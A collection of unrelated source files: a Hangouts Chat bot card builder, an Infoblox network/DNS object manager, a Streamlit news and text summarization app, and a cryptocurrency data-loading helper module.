parent=space_name,
body=response).execute()
def create_card_response(event_message):
"""Creates a card response based on the message sent in Hangouts Chat.
See the reference for JSON keys and format for cards:
https://developers.google.com/hangouts/chat/reference/message-formats/cards
Args:
eventMessage: the user's message to the bot
"""
response = dict()
cards = list()
widgets = list()
header = None
words = event_message.lower().split()
for word in words:
if word == 'header':
header = {
'header': {
'title': BOT_HEADER,
'subtitle': 'Card header',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
}
elif word == 'textparagraph':
widgets.append({
'textParagraph' : {
'text': '<b>This</b> is a <i>text paragraph</i>.'
}
})
elif word == 'keyvalue':
widgets.append({
'keyValue': {
'topLabel': 'KeyValue Widget',
'content': 'This is a KeyValue widget',
'bottomLabel': 'The bottom label',
'icon': 'STAR'
}
})
elif word == 'interactivetextbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'INTERACTIVE BUTTON',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_TEXT_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'interactiveimagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'action': {
'actionMethodName': INTERACTIVE_IMAGE_BUTTON_ACTION,
'parameters': [{
'key': INTERACTIVE_BUTTON_PARAMETER_KEY,
'value': event_message
}]
}
}
}
}
]
})
elif word == 'textbutton':
widgets.append({
'buttons': [
{
'textButton': {
'text': 'TEXT BUTTON',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'imagebutton':
widgets.append({
'buttons': [
{
'imageButton': {
'icon': 'EVENT_SEAT',
'onClick': {
'openLink': {
'url': 'https://developers.google.com',
}
}
}
}
]
})
elif word == 'image':
widgets.append({
'image': {
'imageUrl': 'https://goo.gl/Bpa3Y5',
'onClick': {
'openLink': {
'url': 'https://developers.google.com'
}
}
}
})
if header != None:
cards.append(header)
cards.append({ 'sections': [{ 'widgets': widgets }]})
response['cards'] = cards
return response
def respond_to_interactive_card_click(action_name, custom_params):
"""Creates a response for when the user clicks on an interactive card.
See the guide for creating interactive cards
https://developers.google.com/hangouts/chat/how-tos/cards-onclick
Args:
action_name: the name of the custom action defined in the original bot response
custom_params: the parameters defined in the original bot response
"""
message = 'You clicked {}'.format(
'a text button' if action_name == INTERACTIVE_TEXT_BUTTON_ACTION
else 'an image button')
original_message = ""
if custom_params[0]['key'] == INTERACTIVE_BUTTON_PARAMETER_KEY:
original_message = custom_params[0]['value']
else:
original_message = '<i>Cannot determine original message</i>'
# If you want to respond to the same room but with a new message,
# change the following value to NEW_MESSAGE.
action_response = 'UPDATE_MESSAGE'
return {
'actionResponse': {
'type': action_response
},
'cards': [
{
'header': {
'title': BOT_HEADER,
'subtitle': 'Interactive card clicked',
'imageUrl': 'https://goo.gl/5obRKj',
'imageStyle': 'IMAGE'
}
},
{
'sections': [
{
'widgets': [
{
'textParagraph': {
'text': message
}
},
{
'keyValue': {
'topLabel': 'Original message',
'content': original_message
}
}
]
}
]
}
]
}
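if __name__ == '__main__':
    # Local development entry point (illustrative; in production on App Engine the
    # app is typically served by a WSGI server such as gunicorn instead).
    app.run(host='127.0.0.1', port=8080, debug=True)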
|
the-stack_106_19146
|
# Copyright 2015 Infoblox Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
try:
from oslo_log import log as logging
except ImportError: # pragma: no cover
import logging
from infoblox_client import exceptions as ib_ex
from infoblox_client import objects as obj
from infoblox_client import utils as ib_utils
LOG = logging.getLogger(__name__)
class InfobloxObjectManager(object):
def __init__(self, connector):
self.connector = connector
def create_network_view(self, network_view, extattrs):
return obj.NetworkView.create(self.connector,
name=network_view,
extattrs=extattrs)
def delete_network_view(self, network_view):
# never delete default network view
if network_view == 'default':
return
nview = obj.NetworkView.search(self.connector,
name=network_view)
if nview:
nview.delete()
def create_dns_view(self, network_view, dns_view):
return obj.DNSView.create(self.connector,
name=dns_view,
network_view=network_view)
def delete_dns_view(self, dns_view):
dns_view = obj.DNSView.search(self.connector,
name=dns_view)
if dns_view:
dns_view.delete()
def create_network(self, net_view_name, cidr, nameservers=None,
members=None, gateway_ip=None, dhcp_trel_ip=None,
network_extattrs=None):
"""Create NIOS Network and prepare DHCP options.
Some DHCP options are valid for IPv4 only, so just skip processing
them for IPv6 case.
:param net_view_name: network view name
:param cidr: network to allocate, example '172.23.23.0/24'
:param nameservers: list of name servers hosts/ip
:param members: list of objects.AnyMember objects that are expected
to serve dhcp for created network
:param gateway_ip: gateway ip for the network (valid for IPv4 only)
:param dhcp_trel_ip: ip address of dhcp relay (valid for IPv4 only)
:param network_extattrs: extensible attributes for network (instance of
objects.EA)
:returns: created network (instance of objects.Network)
"""
ipv4 = ib_utils.determine_ip_version(cidr) == 4
options = []
if nameservers:
options.append(obj.DhcpOption(name='domain-name-servers',
value=",".join(nameservers)))
if ipv4 and gateway_ip:
options.append(obj.DhcpOption(name='routers',
value=gateway_ip))
if ipv4 and dhcp_trel_ip:
options.append(obj.DhcpOption(name='dhcp-server-identifier',
num=54,
value=dhcp_trel_ip))
return obj.Network.create(self.connector,
network_view=net_view_name,
cidr=cidr,
members=members,
options=options,
extattrs=network_extattrs,
check_if_exists=False)
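    # Illustrative sketch (not part of the original source): a typical call, with
    # made-up view/CIDR/DHCP values and `connector` assumed to be an initialized
    # infoblox_client connector.
    #
    #   manager = InfobloxObjectManager(connector)
    #   net = manager.create_network('default', '172.23.23.0/24',
    #                                nameservers=['8.8.8.8'],
    #                                gateway_ip='172.23.23.1')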
def get_network(self, network_view, cidr):
return obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
def create_ip_range(self, network_view, start_ip, end_ip, network,
disable, range_extattrs):
"""Creates IPRange or fails if already exists."""
return obj.IPRange.create(self.connector,
network_view=network_view,
start_addr=start_ip,
end_addr=end_ip,
cidr=network,
disable=disable,
extattrs=range_extattrs,
check_if_exists=False)
def delete_ip_range(self, network_view, start_ip, end_ip):
range = obj.IPRange.search(self.connector,
network_view=network_view,
start_addr=start_ip,
end_addr=end_ip)
if range:
range.delete()
def has_networks(self, network_view_name):
networks = obj.Network.search_all(self.connector,
network_view=network_view_name)
return bool(networks)
def network_exists(self, network_view, cidr):
"""Deprecated, use get_network() instead."""
LOG.warning(
"DEPRECATION WARNING! Using network_exists() is deprecated "
"and to be removed in next releases. "
"Use get_network() or objects.Network.search instead")
network = obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
return network is not None
def delete_network(self, network_view, cidr):
network = obj.Network.search(self.connector,
network_view=network_view,
cidr=cidr)
if network:
network.delete()
def create_network_from_template(self, network_view, cidr, template,
extattrs):
return obj.Network.create(self.connector,
network_view=network_view,
cidr=cidr,
template=template,
extattrs=extattrs,
check_if_exists=False)
def update_network_options(self, ib_network, extattrs=None):
if extattrs:
if ib_network.extattrs:
# Merge EA values as dicts
ea_dict = ib_network.extattrs.ea_dict
ea_dict.update(extattrs.ea_dict)
merged_ea = obj.EA(ea_dict)
ib_network.extattrs = merged_ea
else:
ib_network.extattrs = extattrs
return ib_network.update()
def get_host_record(self, dns_view, ip, network_view=None):
return obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip,
network_view=network_view)
def find_hostname(self, dns_view, hostname, ip, network_view=None):
return obj.HostRecord.search(self.connector,
name=hostname,
view=dns_view,
ip=ip,
network_view=network_view)
def find_host_records_by_mac(self, dns_view, mac, network_view=None):
host_records = []
host_records.extend(obj.HostRecord.search_all(
self.connector, view=dns_view, mac=mac, network_view=network_view))
# Unfortunately WAPI does not support search host records by DUID, so
# search host addresses by duid and then search hosts by name
ipv6_host_addresses = obj.IPv6HostAddress.search_all(
self.connector, duid=mac, network_view=network_view)
ipv6_hosts = []
for addr in ipv6_host_addresses:
hosts = obj.HostRecordV6.search_all(
self.connector, name=addr.host, view=dns_view,
network_view=network_view)
for host in hosts:
if host not in ipv6_hosts:
ipv6_hosts.append(host)
host_records.extend(ipv6_hosts)
return host_records
def create_host_record_for_given_ip(self, dns_view, zone_auth,
hostname, mac, ip, extattrs,
use_dhcp, use_dns=True):
name = '.'.join([hostname, zone_auth])
ip_obj = obj.IP.create(ip=ip, mac=mac, configure_for_dhcp=use_dhcp)
return obj.HostRecord.create(self.connector,
view=dns_view,
name=name,
ip=ip_obj,
configure_for_dns=use_dns,
extattrs=extattrs,
check_if_exists=False)
def create_host_record_from_range(self, dns_view, network_view_name,
zone_auth, hostname, mac, first_ip,
last_ip, extattrs, use_dhcp,
use_dns=True):
name = '.'.join([hostname, zone_auth])
ip_alloc = obj.IPAllocation.next_available_ip_from_range(
network_view_name, first_ip, last_ip)
ip_obj = obj.IP.create(ip=ip_alloc, mac=mac,
configure_for_dhcp=use_dhcp)
return obj.HostRecord.create(self.connector,
view=dns_view,
name=name,
ip=ip_obj,
configure_for_dns=use_dns,
extattrs=extattrs,
check_if_exists=False)
def delete_host_record(self, dns_view, ip_address, network_view=None):
host_record = obj.HostRecord.search(self.connector,
view=dns_view, ip=ip_address,
network_view=network_view)
if host_record:
host_record.delete()
def create_fixed_address_for_given_ip(self, network_view, mac, ip,
extattrs):
return obj.FixedAddress.create(self.connector,
network_view=network_view,
mac=mac,
ip=ip,
extattrs=extattrs,
check_if_exists=False)
def create_fixed_address_from_range(self, network_view, mac, first_ip,
last_ip, extattrs):
ip = obj.IPAllocation.next_available_ip_from_range(
network_view, first_ip, last_ip)
return obj.FixedAddress.create(self.connector,
ip=ip,
mac=mac,
network_view=network_view,
extattrs=extattrs,
check_if_exists=False)
def create_fixed_address_from_cidr(self, netview, mac, cidr, extattrs):
ip = obj.IPAllocation.next_available_ip_from_cidr(netview, cidr)
return obj.FixedAddress.create(self.connector,
network_view=netview,
ip=ip,
mac=mac,
extattrs=extattrs,
check_if_exists=False)
def delete_fixed_address(self, network_view, ip_address):
fixed_address = obj.FixedAddress.search(self.connector,
network_view=network_view,
ip=ip_address)
if fixed_address:
fixed_address.delete()
def get_fixed_addresses_by_mac(self, network_view, mac):
return obj.FixedAddress.search_all(
self.connector, network_view=network_view, mac=mac)
def add_ip_to_record(self, host_record, ip, mac, use_dhcp=True):
ip_obj = obj.IP.create(ip=ip, mac=mac, configure_for_dhcp=use_dhcp)
host_record.ip.append(ip_obj)
return host_record.update()
def add_ip_to_host_record_from_range(self, host_record, network_view,
mac, first_ip, last_ip,
use_dhcp=True):
ip_alloc = obj.IPAllocation.next_available_ip_from_range(
network_view, first_ip, last_ip)
ip_obj = obj.IP.create(ip=ip_alloc, mac=mac,
configure_for_dhcp=use_dhcp)
host_record.ip.append(ip_obj)
return host_record.update()
def delete_ip_from_host_record(self, host_record, ip):
host_record.ip.remove(ip)
return host_record.update()
def has_dns_zones(self, dns_view):
zones = obj.DNSZone.search_all(self.connector, view=dns_view)
return bool(zones)
def create_dns_zone(self, dns_view, dns_zone,
grid_primary=None, grid_secondaries=None,
zone_format=None, ns_group=None, prefix=None,
extattrs=None):
return obj.DNSZone.create(self.connector,
fqdn=dns_zone,
view=dns_view,
extattrs=extattrs,
zone_format=zone_format,
ns_group=ns_group,
prefix=prefix,
grid_primary=grid_primary,
grid_secondaries=grid_secondaries)
def delete_dns_zone(self, dns_view, dns_zone_fqdn):
dns_zone = obj.DNSZone.search(self.connector,
fqdn=dns_zone_fqdn,
view=dns_view)
if dns_zone:
dns_zone.delete()
def update_dns_zone_attrs(self, dns_view, dns_zone_fqdn, extattrs):
if not extattrs:
return
dns_zone = obj.DNSZone.search(self.connector,
fqdn=dns_zone_fqdn,
view=dns_view)
if dns_zone:
dns_zone.extattrs = extattrs
dns_zone.update()
def update_host_record_eas(self, dns_view, ip, extattrs):
host_record = obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip)
if host_record:
host_record.extattrs = extattrs
host_record.update()
def update_fixed_address_eas(self, network_view, ip, extattrs):
fixed_address = obj.FixedAddress.search(self.connector,
network_view=network_view,
ip=ip)
if fixed_address:
fixed_address.extattrs = extattrs
fixed_address.update()
def update_dns_record_eas(self, dns_view, ip, extattrs):
a_record = obj.ARecordBase.search(self.connector,
ip=ip,
view=dns_view)
if a_record:
a_record.extattrs = extattrs
a_record.update()
ptr_record = obj.PtrRecord.search(self.connector,
ip=ip,
view=dns_view)
if ptr_record:
ptr_record.extattrs = extattrs
ptr_record.update()
def bind_name_with_host_record(self, dns_view, ip, name, extattrs,
network_view=None):
host_record = obj.HostRecord.search(self.connector,
view=dns_view,
ip=ip,
network_view=network_view)
if host_record:
host_record.name = name
host_record.extattrs = extattrs
host_record.update()
def bind_name_with_record_a(self, dns_view, ip, name, bind_list,
extattrs):
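        """Bind a DNS name to an IP by creating the A/AAAA and/or PTR
        records requested in bind_list.
        """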
is_ipv4 = ib_utils.determine_ip_version(ip) == 4
if ((is_ipv4 and 'record:a' in bind_list) or
(not is_ipv4 and 'record:aaaa' in bind_list)):
obj.ARecordBase.create(self.connector,
view=dns_view,
ip=ip,
name=name,
extattrs=extattrs,
update_if_exists=True)
if 'record:ptr' in bind_list:
obj.PtrRecord.create(self.connector,
view=dns_view,
ip=ip,
ptrdname=name,
extattrs=extattrs,
update_if_exists=True)
def unbind_name_from_record_a(self, dns_view, ip, name, unbind_list):
is_ipv4 = ib_utils.determine_ip_version(ip) == 4
if ((is_ipv4 and 'record:a' in unbind_list) or
(not is_ipv4 and 'record:aaaa' in unbind_list)):
a_record = obj.ARecordBase.search(self.connector,
view=dns_view,
ip=ip,
name=name)
if a_record:
self.delete_objects_associated_with_a_record(a_record.name,
a_record.view,
unbind_list)
a_record.delete()
if 'record:ptr' in unbind_list:
ptr_record = obj.PtrRecord.search(self.connector,
view=dns_view,
ip=ip,
ptrdname=name)
if ptr_record:
ptr_record.delete()
def get_member(self, member):
member.fetch()
return member
def get_all_ea_definitions(self):
return obj.EADefinition.search_all(self.connector)
def create_ea_definition(self, ea_def, reraise=False):
try:
return obj.EADefinition.create(self.connector,
check_if_exists=False,
**ea_def)
except ib_ex.InfobloxCannotCreateObject:
LOG.error('Unable to create Extensible Attribute Definition '
'%s' % ea_def)
if reraise:
raise
def create_required_ea_definitions(self, required_ea_defs, reraise=False):
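        """Create any required EA definitions missing from the grid.
        Compares required_ea_defs with the definitions already present and
        creates only the missing ones, returning the list of those created.
        """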
existing_ea_defs = self.get_all_ea_definitions()
missing_ea_defs = []
for req_def in required_ea_defs:
if not [ea_def for ea_def in existing_ea_defs
if ea_def.name == req_def['name']]:
missing_ea_defs.append(req_def)
created_ea_defs = []
for ea_def in missing_ea_defs:
if self.create_ea_definition(ea_def, reraise=reraise):
created_ea_defs.append(ea_def)
return created_ea_defs
def restart_all_services(self, member):
if not member._ref:
member.fetch(only_ref=True)
self.connector.call_func('restartservices', member._ref,
{'restart_option': 'RESTART_IF_NEEDED',
'service_option': 'ALL'})
def delete_objects_associated_with_a_record(self, name, view, delete_list):
"""Deletes records associated with record:a or record:aaaa."""
search_objects = {}
if 'record:cname' in delete_list:
search_objects['record:cname'] = 'canonical'
if 'record:txt' in delete_list:
search_objects['record:txt'] = 'name'
if not search_objects:
return
for obj_type, search_type in search_objects.items():
payload = {'view': view,
search_type: name}
ib_objs = self.connector.get_object(obj_type, payload)
if ib_objs:
for ib_obj in ib_objs:
self.delete_object_by_ref(ib_obj['_ref'])
def delete_all_associated_objects(self, network_view, ip, delete_list):
LOG.warning(
"DEPRECATION WARNING! Using delete_all_associated_objects() "
"is deprecated and to be removed in next releases. "
"Use unbind_name_from_record_a() instead.")
def delete_object_by_ref(self, ref):
try:
self.connector.delete_object(ref)
except ib_ex.InfobloxCannotDeleteObject:
pass
|
the-stack_106_19150
|
import streamlit as st
from helper import get_summary, spacy_rander, fetch_news, fetch_news_links
st.set_page_config(
page_title="Data Analysis Web App",
page_icon="🧊",
layout="wide",
initial_sidebar_state="expanded",
menu_items={
'Get Help': 'https://github.com/everydaycodings/Text-Summarization-using-NLP',
'Report a bug': "https://github.com/everydaycodings/Text-Summarization-using-NLP/issues/new",
'About': "# This is a header. This is an *extremely* cool app!"
}
)
st.sidebar.title("Text Summarization Web App")
option = ["News Summary and Headlines", "Custom Text Summarization"]
choice = st.sidebar.selectbox("Select an option of your choice", options=option)
if choice == "Custom Text Summarization":
st.sidebar.markdown("Copy Sample Article if you want to test the web app. [[article source](https://edition.cnn.com/2022/02/14/us/new-mexico-albuquerque-stabbings/index.html)]")
st.sidebar.code(open("presentation/sample.txt","r").read())
st.title("Welcome to {}".format(choice))
col1, col2 = st.columns(2)
with col1:
        text = st.text_area(label="Enter Your Text or story", height=350, placeholder="Enter your text, story, or article; it can be of any length")
if st.button("Get Summary and Headline"):
summary = get_summary(text)
try:
with col2:
st.write("Text Summary (Summary length: {})".format(len(summary)))
st.code(summary)
st.write("Text Headline")
st.code("Feature Comming Soon")
spacy_rander(summary)
#with st.expander("Get Original Article Analysis"):
spacy_rander(text, text="Yes")
except NameError:
pass
if choice == "News Summary and Headlines":
st.title("BBC News Summary")
search_query = st.text_input("", placeholder="Enter the topic you want to search")
st.write(" ")
link, title, thumbnail = fetch_news_links(search_query)
fetch_news = fetch_news(link)
if link != []:
col1, col2 = st.columns(2)
with col1:
for i in range(len(link)):
if (i % 2) == 0:
st.image(thumbnail[i])
st.write(title[i])
with st.expander("Read The Summary"):
st.write(get_summary(fetch_news[i]))
st.markdown("[**Read Full Article**]({})".format(link[i]), unsafe_allow_html=True)
st.write(" ")
with col2:
for i in range(len(link)):
if (i % 2) != 0:
st.image(thumbnail[i])
st.write(title[i])
with st.expander("Read The Summary"):
st.write(get_summary(fetch_news[i]))
st.markdown("[**Read Full Article**]({})".format(link[i]), unsafe_allow_html=True)
st.write(" ")
else:
st.info("No Result found for {} Please try some popular Keywords".format(search_query))
|
the-stack_106_19151
|
"""Cryptocurrency helpers"""
__docformat__ = "numpy"
# pylint: disable=C0301,R0911,C0302
import os
import json
from typing import Tuple, Any, Optional, List
import difflib
import logging
import pandas as pd
import numpy as np
from binance.client import Client
import matplotlib.pyplot as plt
import mplfinance as mpf
from pycoingecko import CoinGeckoAPI
from gamestonk_terminal.helper_funcs import (
plot_autoscale,
export_data,
print_rich_table,
)
from gamestonk_terminal.config_plot import PLOT_DPI
from gamestonk_terminal.cryptocurrency.due_diligence import (
pycoingecko_model,
coinpaprika_model,
)
from gamestonk_terminal.cryptocurrency.discovery.pycoingecko_model import get_coin_list
from gamestonk_terminal.cryptocurrency.overview.coinpaprika_model import (
get_list_of_coins,
)
from gamestonk_terminal.cryptocurrency.due_diligence.binance_model import (
check_valid_binance_str,
show_available_pairs_for_given_symbol,
)
from gamestonk_terminal.config_terminal import theme
from gamestonk_terminal.cryptocurrency.due_diligence import coinbase_model
import gamestonk_terminal.config_terminal as cfg
from gamestonk_terminal.rich_config import console
logger = logging.getLogger(__name__)
INTERVALS = ["1H", "3H", "6H", "1D"]
SOURCES_INTERVALS = {
"bin": [
"1day",
"3day",
"1hour",
"2hour",
"4hour",
"6hour",
"8hour",
"12hour",
"1week",
"1min",
"3min",
"5min",
"15min",
"30min",
"1month",
],
"cb": [
"1min",
"5min",
"15min",
"1hour",
"6hour",
"24hour",
"1day",
],
}
def load_cg_coin_data(
coin: str, currency: str = "USD", days: int = 365, sampling: str = "1D"
) -> pd.DataFrame:
"""Load cryptocurrency data from CoinGecko
Timestamps from CoinGecko are not uniform, so the sampling is included to provide ohlc bars.
Note that for days > 90, daily data is returned as prices only. Less than 90 days returns hourly data
which can be consolidated into OHLC
Parameters
----------
coin : str
Cryptocurrency to load
currency : str, optional
Conversion unit, by default "USD"
days : int, optional
Number of days to get, by default 365
sampling : str, optional
        Time period to resample in the format #U where U can be H (hour) or D (day), by default "1D"
Returns
-------
pd.DataFrame
DataFrame of OHLC
"""
prices = CoinGeckoAPI().get_coin_market_chart_by_id(coin, currency, days)
df = pd.DataFrame(data=prices["prices"], columns=["time", "price"])
df["time"] = pd.to_datetime(df.time, unit="ms")
df = df.set_index("time")
if days > 90:
sampling = "1D"
df = df.resample(sampling).ohlc()
df.columns = ["Open", "High", "Low", "Close"]
return df
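# Usage sketch (illustrative only, not exercised at import time): shows how
# load_cg_coin_data can be called. "bitcoin" is an example CoinGecko id and a
# live CoinGecko API call is assumed.
def _example_load_cg_coin_data() -> pd.DataFrame:
    # 30 days of hourly CoinGecko prices resampled into 6-hour OHLC bars
    return load_cg_coin_data("bitcoin", currency="usd", days=30, sampling="6H")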
def _load_coin_map(file_name: str) -> pd.DataFrame:
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
coins = json.load(f)
coins_df = pd.Series(coins).reset_index()
coins_df.columns = ["symbol", "id"]
return coins_df
def read_data_file(file_name: str):
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
return json.load(f)
def load_coins_list(file_name: str, return_raw: bool = False) -> pd.DataFrame:
if file_name.split(".")[1] != "json":
raise TypeError("Please load json file")
current_dir = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(current_dir, "data", file_name)
with open(path, encoding="utf8") as f:
coins = json.load(f)
if return_raw:
return coins
return pd.DataFrame(coins)
def load_binance_map():
return _load_coin_map("binance_gecko_map.json")
def load_coinbase_map():
return _load_coin_map("coinbase_gecko_map.json")
def prepare_all_coins_df() -> pd.DataFrame:
"""Helper method which loads coins from all sources: CoinGecko, CoinPaprika, Binance
and merge those coins on keys:
CoinGecko - > name < - CoinPaprika
CoinGecko - > id <- Binance
Returns
-------
pd.DataFrame
CoinGecko - id for coin in CoinGecko API: uniswap
CoinPaprika - id for coin in CoinPaprika API: uni-uniswap
Binance - symbol (baseAsset) for coin in Binance API: UNI
Coinbase - symbol for coin in Coinbase Pro API e.g UNI
Symbol: uni
"""
gecko_coins_df = load_coins_list("coingecko_coins.json")
paprika_coins_df = load_coins_list("coinpaprika_coins.json")
paprika_coins_df = paprika_coins_df[paprika_coins_df["is_active"]]
paprika_coins_df = paprika_coins_df[["rank", "id", "name", "symbol", "type"]]
# TODO: Think about scheduled job, that once a day will update data
binance_coins_df = load_binance_map().rename(columns={"symbol": "Binance"})
coinbase_coins_df = load_coinbase_map().rename(columns={"symbol": "Coinbase"})
gecko_paprika_coins_df = pd.merge(
gecko_coins_df, paprika_coins_df, on="name", how="left"
)
df_merged = pd.merge(
left=gecko_paprika_coins_df,
right=binance_coins_df,
left_on="id_x",
right_on="id",
how="left",
)
df_merged.rename(
columns={
"id_x": "CoinGecko",
"symbol_x": "Symbol",
"id_y": "CoinPaprika",
},
inplace=True,
)
df_merged = pd.merge(
left=df_merged,
right=coinbase_coins_df,
left_on="CoinGecko",
right_on="id",
how="left",
)
return df_merged[["CoinGecko", "CoinPaprika", "Binance", "Coinbase", "Symbol"]]
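# Usage sketch (illustrative only): looks up a single symbol in the merged
# CoinGecko/CoinPaprika/Binance/Coinbase map built above; "uni" mirrors the
# docstring example and the bundled JSON data files are assumed to be present.
def _example_lookup_symbol(symbol: str = "uni") -> pd.DataFrame:
    mapping = prepare_all_coins_df().set_index("Symbol")
    return mapping.loc[[symbol]]  # ids for the same coin across all sources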
def _create_closest_match_df(
coin: str, coins: pd.DataFrame, limit: int, cutoff: float
) -> pd.DataFrame:
"""Helper method. Creates a DataFrame with best matches for given coin found in given list of coins.
Based on difflib.get_close_matches func.
Parameters
----------
coin: str
coin you search for
coins: list
list of coins in which you want to find similarities
limit: int
limit of matches
cutoff: float
        float between <0, 1>. Show only coin matches with a score higher than the cutoff.
Returns
-------
pd.DataFrame
        index, id, name, symbol -> depends on the source of data.
"""
coins_list = coins["id"].to_list()
sim = difflib.get_close_matches(coin, coins_list, limit, cutoff)
df = pd.Series(sim).to_frame().reset_index()
df.columns = ["index", "id"]
return df.merge(coins, on="id")
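# Usage sketch (illustrative only): fuzzy-matches a misspelled query against
# the CoinPaprika coin list using the helper above; the limit and cutoff
# values are arbitrary examples.
def _example_closest_matches(query: str = "etherum") -> pd.DataFrame:
    coins_df = get_list_of_coins()  # CoinPaprika list, contains an "id" column
    return _create_closest_match_df(query, coins_df, limit=5, cutoff=0.6)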
# TODO: verify vs, interval, days, depending on source
def load(
coin: str,
source: str = "cp",
days: int = 60,
vs: str = "usd",
interval: str = "1day",
should_load_ta_data: bool = False,
):
"""Load cryptocurrency from given source. Available sources are: CoinGecko, CoinPaprika, Coinbase and Binance.
Loading coin from Binance and CoinPaprika means validation if given coins exists in chosen source,
if yes then id of the coin is returned as a string.
In case of CoinGecko load will return Coin object, if provided coin exists. Coin object has access to different coin
information.
Parameters
----------
coin: str
Coin symbol or id which is checked if exists in chosen data source.
source : str
Source of the loaded data. CoinGecko, CoinPaprika, or Binance
Returns
-------
Tuple[Union[str, pycoingecko_model.Coin], str, str]
- str or Coin object for provided coin
- str with source of the loaded data. CoinGecko, CoinPaprika, or Binance
- str with symbol
- Dataframe with coin map to different sources
"""
if source in ("cg", "cp"):
if vs not in ("USD", "BTC", "usd", "btc"):
console.print("You can only compare with usd or btc (e.g., --vs usd)\n")
return None, None, None, None, None, None
if interval != "1day":
console.print(
"Only daily data is supported for coingecko and coinpaprika (e.g., -i 1day)\n"
)
return None, None, None, None, None, None
current_coin = "" # type: Optional[Any]
coins_map_df = prepare_all_coins_df().set_index("Symbol").dropna(thresh=2)
if source == "cg":
coingecko = pycoingecko_model.Coin(coin.lower(), True)
if not coingecko.symbol:
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[coingecko.symbol]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
) # TODO: improve to choose the row that matches better;
# if it is dataframe, it means that found more than 1 coin
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=days,
limit=0,
interval=interval,
)
return (
str(coingecko),
source,
coingecko.symbol,
coin_map_df,
df_prices,
currency,
)
return (
str(coingecko),
source,
coingecko.symbol,
coin_map_df,
None,
None,
)
if source == "cp":
paprika_coins = get_list_of_coins()
paprika_coins_dict = dict(zip(paprika_coins.id, paprika_coins.symbol))
current_coin, symbol = coinpaprika_model.validate_coin(coin, paprika_coins_dict)
if not symbol:
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[symbol.lower() if symbol is not None else symbol]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=days,
limit=0,
interval=interval,
)
return (current_coin, source, symbol, coin_map_df, df_prices, currency)
return (current_coin, source, symbol, coin_map_df, None, None)
if source == "bin":
if vs == "usd":
vs = "USDT"
if interval not in SOURCES_INTERVALS["bin"]:
console.print(
"Interval not available on binance. Run command again with one supported (e.g., -i 1day):\n",
SOURCES_INTERVALS["bin"],
)
return None, None, None, None, None, None
# TODO: convert bitcoin to btc before searching pairs
parsed_coin = coin.upper()
current_coin, pairs = show_available_pairs_for_given_symbol(parsed_coin)
if len(pairs) > 0:
if vs not in pairs:
console.print(
"vs specified not supported by binance. Run command again with one supported (e.g., --vs USDT):\n",
pairs,
)
return None, None, None, None, None, None
coin_map_df = coins_map_df.loc[parsed_coin.lower()]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
# console.print(f"Coin found : {current_coin}\n")
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=0,
limit=days,
interval=interval,
)
return (
current_coin,
source,
parsed_coin,
coin_map_df,
df_prices,
currency,
)
return (current_coin, source, parsed_coin, coin_map_df, None, None)
return None, None, None, None, None, None
if source == "cb":
if vs == "usd":
vs = "USDT"
if interval not in SOURCES_INTERVALS["cb"]:
console.print(
"Interval not available on coinbase. Run command again with one supported (e.g., -i 1day):\n",
SOURCES_INTERVALS["cb"],
)
return None, None, None, None, None, None
# TODO: convert bitcoin to btc before searching pairs
coinbase_coin = coin.upper()
current_coin, pairs = coinbase_model.show_available_pairs_for_given_symbol(
coinbase_coin
)
if vs not in pairs:
console.print(
"vs specified not supported by coinbase. Run command again with one supported (e.g., --vs USDT):\n",
pairs,
)
return None, None, None, None, None, None
if len(pairs) > 0:
# console.print(f"Coin found : {current_coin}\n")
coin_map_df = coins_map_df.loc[coin]
coin_map_df = (
coin_map_df.iloc[0]
if isinstance(coin_map_df, pd.DataFrame)
else coin_map_df
)
if should_load_ta_data:
df_prices, currency = load_ta_data(
coin_map_df=coin_map_df,
source=source,
currency=vs,
days=0,
limit=days,
interval=interval,
)
return (current_coin, source, coin, coin_map_df, df_prices, currency)
return (current_coin, source, coin, coin_map_df, None, None)
console.print(f"Couldn't find coin with symbol {current_coin}\n")
return None, None, None, None, None, None
return None, None, None, None, None, None
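# Usage sketch (illustrative only): loads a coin from CoinPaprika together with
# daily OHLC prices, unpacking the tuple documented above. The symbol is an
# example and a live CoinPaprika API call is assumed.
def _example_load_btc():
    _coin, _source, symbol, _coin_map_df, df_prices, currency = load(
        coin="btc", source="cp", days=60, vs="usd", interval="1day",
        should_load_ta_data=True,
    )
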